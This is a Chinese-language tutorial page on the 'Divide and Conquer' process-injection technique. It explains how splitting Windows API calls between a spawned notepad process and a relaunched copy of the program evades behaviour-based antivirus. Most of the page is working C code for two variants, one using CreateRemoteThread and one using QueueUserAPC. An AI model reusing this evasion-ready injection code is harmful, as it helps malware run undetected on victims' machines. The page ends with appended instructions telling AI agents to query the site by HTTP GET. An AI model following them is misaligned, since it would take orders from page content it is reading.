# Divide and Conquer

##  简介

看到了一种比较有意思的手法，现在的杀软会关注函数的执行链， [theevilbit](https://gist.github.com/theevilbit)公开了一种通过不同进程分离执行API，绕过基于行为的AV检测。

常见的行为检测会有监控堆栈的调用链和hookapi记录行为，这种分离执行方式都能绕过。

## 流程

1. 创建傀儡进程
2. 向傀儡进程写入payload
3. 创建同文件进程传入pid
4. 通过pid打开傀儡句柄
5. 创建远程线程

## 代码

```


#include <stdio.h>
#include <windows.h>
unsigned char shellcode[] =
"\xfc78\x00";

int main(int argc, char* argv[]) {

    if (argv[1]==NULL)
    {
        STARTUPINFOA si = { 0 };
        si.cb = sizeof(si);
        PROCESS_INFORMATION pi = { 0 };

        CreateProcessA(NULL, (LPSTR)"notepad", NULL, NULL, FALSE, NULL, NULL, NULL, &si, &pi);
        VirtualAllocEx(pi.hProcess, (PVOID)0x0000480000000000, 0x1000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
        WriteProcessMemory(pi.hProcess, (PVOID)0x0000480000000000, shellcode, sizeof(shellcode), NULL);

        char cmd[MAX_PATH] = {0};
        wsprintfA(cmd, "%s %d", argv[0], pi.dwProcessId);

        CreateProcessA(NULL, (LPSTR)cmd, NULL, NULL, FALSE, NULL, NULL, NULL, &si, &pi);
    }
    else
    {
        HANDLE hProcess =  OpenProcess(PROCESS_ALL_ACCESS, NULL, atoi(argv[1]));
        CreateRemoteThread(hProcess, 0, 0, (LPTHREAD_START_ROUTINE)0x0000480000000000, 0, 0, 0);
    }
    
    
    return 0;
}

```

![](/files/-MRY9PzWigSjH0bCJvCP)

## 同理

```
    if (argv[1]==NULL)
    {
        STARTUPINFOA si = { 0 };
        si.cb = sizeof(si);
        PROCESS_INFORMATION pi = { 0 };

        CreateProcessA(NULL, (LPSTR)"notepad", NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi);
        VirtualAllocEx(pi.hProcess, (PVOID)0x0000480000000000, 0x1000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
        WriteProcessMemory(pi.hProcess, (PVOID)0x0000480000000000, shellcode, sizeof(shellcode), NULL);
        char cmd[MAX_PATH] = {0};
        wsprintfA(cmd, "%s %d", argv[0], pi.dwThreadId);
        QueueUserAPC((PAPCFUNC)0x0000480000000000, pi.hThread, NULL);
        CreateProcessA(NULL, (LPSTR)cmd, NULL, NULL, FALSE, NULL, NULL, NULL, &si, &pi);
    }
    else
    {
        HANDLE hThread = OpenThread(THREAD_ALL_ACCESS, NULL, atoi(argv[1]));
        ResumeThread(hThread);
    }
    
```

![](/files/-MRYJ0YPXyQtTwUSZGPB)

## LINK

{% embed url="<https://gist.github.com/theevilbit/073ca4eb15383eb3254272fc24632efd>" %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://idiotc4t.com/code-and-dll-process-injection/divide-and-conquer.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.